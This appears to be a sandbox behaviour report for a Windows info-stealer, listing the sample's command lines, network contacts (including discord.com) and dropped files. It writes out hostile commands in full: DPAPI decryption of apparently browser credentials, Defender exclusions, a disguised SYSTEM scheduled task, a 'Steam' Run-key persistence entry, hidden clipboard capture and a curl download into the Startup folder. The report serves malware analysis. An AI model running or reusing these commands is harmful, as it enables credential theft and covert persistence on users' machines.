C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4E3F.tmp" "c:\Users\Admin\AppData\Local\Temp\qtagxonl\CSCE75638D725114F8D869526969E6E8748.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,21,132,39,125,251,197,112,255,33,153,107,47,121,214,234,135,34,33,42,99,143,61,94,66,143,145,162,28,26,139,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,164,114,54,58,32,21,27,189,140,220,175,0,249,237,6,55,173,49,111,135,73,189,159,245,154,186,138,144,110,241,215,48,0,0,0,212,14,55,96,166,185,109,171,187,66,86,245,183,43,7,69,45,40,4,250,238,162,185,42,111,64,105,180,41,243,42,27,52,205,79,189,55,83,24,110,217,21,95,67,82,26,76,133,64,0,0,0,35,67,78,122,80,186,145,63,221,230,112,6,94,81,38,203,245,83,64,246,38,188,82,0,224,153,13,45,209,126,179,93,223,195,224,235,15,7,184,251,215,218,125,26,55,249,139,176,175,193,111,171,254,197,23,58,90,183,203,222,120,170,86,169), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,21,132,39,125,251,197,112,255,33,153,107,47,121,214,234,135,34,33,42,99,143,61,94,66,143,145,162,28,26,139,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,164,114,54,58,32,21,27,189,140,220,175,0,249,237,6,55,173,49,111,135,73,189,159,245,154,186,138,144,110,241,215,48,0,0,0,212,14,55,96,166,185,109,171,187,66,86,245,183,43,7,69,45,40,4,250,238,162,185,42,111,64,105,180,41,243,42,27,52,205,79,189,55,83,24,110,217,21,95,67,82,26,76,133,64,0,0,0,35,67,78,122,80,186,145,63,221,230,112,6,94,81,38,203,245,83,64,246,38,188,82,0,224,153,13,45,209,126,179,93,223,195,224,235,15,7,184,251,215,218,125,26,55,249,139,176,175,193,111,171,254,197,23,58,90,183,203,222,120,170,86,169), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,172,10,216,232,15,37,158,119,88,250,148,87,92,51,72,72,36,95,145,150,227,23,216,4,42,221,50,75,178,104,36,160,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,132,236,218,13,85,102,89,234,54,186,13,51,235,48,156,152,89,252,191,243,203,88,117,230,86,55,201,234,128,220,87,48,0,0,0,34,11,113,88,165,221,250,230,124,28,211,23,203,89,232,67,100,137,156,72,121,28,89,53,208,73,104,239,179,119,239,68,155,192,154,153,18,41,9,68,14,187,224,156,4,131,86,10,64,0,0,0,172,142,22,215,99,2,196,120,174,131,146,150,221,167,186,6,253,30,9,17,114,205,220,151,0,2,223,18,17,149,205,118,107,177,26,91,44,211,135,10,201,31,241,216,214,213,113,253,129,206,58,164,242,150,9,187,51,47,163,44,103,192,53,154), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,172,10,216,232,15,37,158,119,88,250,148,87,92,51,72,72,36,95,145,150,227,23,216,4,42,221,50,75,178,104,36,160,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,132,236,218,13,85,102,89,234,54,186,13,51,235,48,156,152,89,252,191,243,203,88,117,230,86,55,201,234,128,220,87,48,0,0,0,34,11,113,88,165,221,250,230,124,28,211,23,203,89,232,67,100,137,156,72,121,28,89,53,208,73,104,239,179,119,239,68,155,192,154,153,18,41,9,68,14,187,224,156,4,131,86,10,64,0,0,0,172,142,22,215,99,2,196,120,174,131,146,150,221,167,186,6,253,30,9,17,114,205,220,151,0,2,223,18,17,149,205,118,107,177,26,91,44,211,135,10,201,31,241,216,214,213,113,253,129,206,58,164,242,150,9,187,51,47,163,44,103,192,53,154), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wsaaxogk\wsaaxogk.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5321.tmp" "c:\Users\Admin\AppData\Local\Temp\wsaaxogk\CSC82BD7343C72445C29BBF7D71682CAEA.TMP"

C:\Windows\system32\cscript.EXE

C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\rename_me.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cscript.EXE

C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\rename_me.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cscript.EXE

C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\rename_me.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 8.8.8.8:53 discord.com udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
N/A 224.0.0.251:5353 N/A udp

Files

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

C:\Users\Admin\AppData\Local\Temp\temp.ps1

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kkdyqtki.1ca.ps1

\??\c:\Users\Admin\AppData\Local\Temp\qtagxonl\qtagxonl.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\qtagxonl\qtagxonl.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\qtagxonl\CSCE75638D725114F8D869526969E6E8748.TMP

C:\Users\Admin\AppData\Local\Temp\RES4E3F.tmp

C:\Users\Admin\AppData\Local\Temp\qtagxonl\qtagxonl.dll

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

\??\c:\Users\Admin\AppData\Local\Temp\wsaaxogk\wsaaxogk.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\wsaaxogk\wsaaxogk.0.cs

C:\Users\Admin\AppData\Local\Temp\RES5321.tmp

C:\Users\Admin\AppData\Local\Temp\wsaaxogk\wsaaxogk.dll

\??\c:\Users\Admin\AppData\Local\Temp\wsaaxogk\CSC82BD7343C72445C29BBF7D71682CAEA.TMP

C:\ProgramData\edge\Updater\RunBatHidden.vbs

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
